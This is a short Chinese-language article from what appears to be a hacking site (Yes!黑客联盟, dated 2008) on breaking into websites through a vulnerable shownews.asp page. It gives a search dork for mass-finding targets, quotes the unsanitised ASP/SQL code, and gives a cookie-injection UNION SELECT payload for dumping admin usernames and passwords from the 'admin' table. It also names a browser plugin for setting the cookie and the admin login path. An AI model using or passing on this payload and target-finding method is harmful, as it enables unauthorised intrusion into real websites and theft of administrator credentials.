arow 您现在的位置: Yes!黑客联盟 >> 技术 >> 黑客技术 >> 黑客文献 >> 正文
专题栏目
热门文章
推荐文章
shownews.asp 漏洞入侵           
shownews.asp 漏洞入侵
作者:YesHack.… 文章来源:YesHack.Com 更新时间:2008-3-3 8:07:04 【字体:

大家用挖掘鸡 添加后缀“/shownews.asp” 关键字为:“企业邮局 联系我们 繁体中文”搜索吧
搜到的都有漏洞,然后利用cookie注入直接得到管理员用户名和秘密
漏洞出在
<%owen=request("id")%>
sql="select * from news where id="&owen

cookie注入时 cookie名称:id
cookie属性:-1 union select 1,username,password,4,5,6,7,8,9,10 from admin
最好用GreenBrowser,因为它有个javaScript Cookier 插件。。

差点忘了,后台地址为:http://www.***.com/admin/login.asp

 


友情提示:如果您对本文章的内容存在疑问请到点此进入论坛进行讨论
文章录入:YesHack    责任编辑:YesHack.Com 
  • 上一篇文章:

  • 下一篇文章:
    •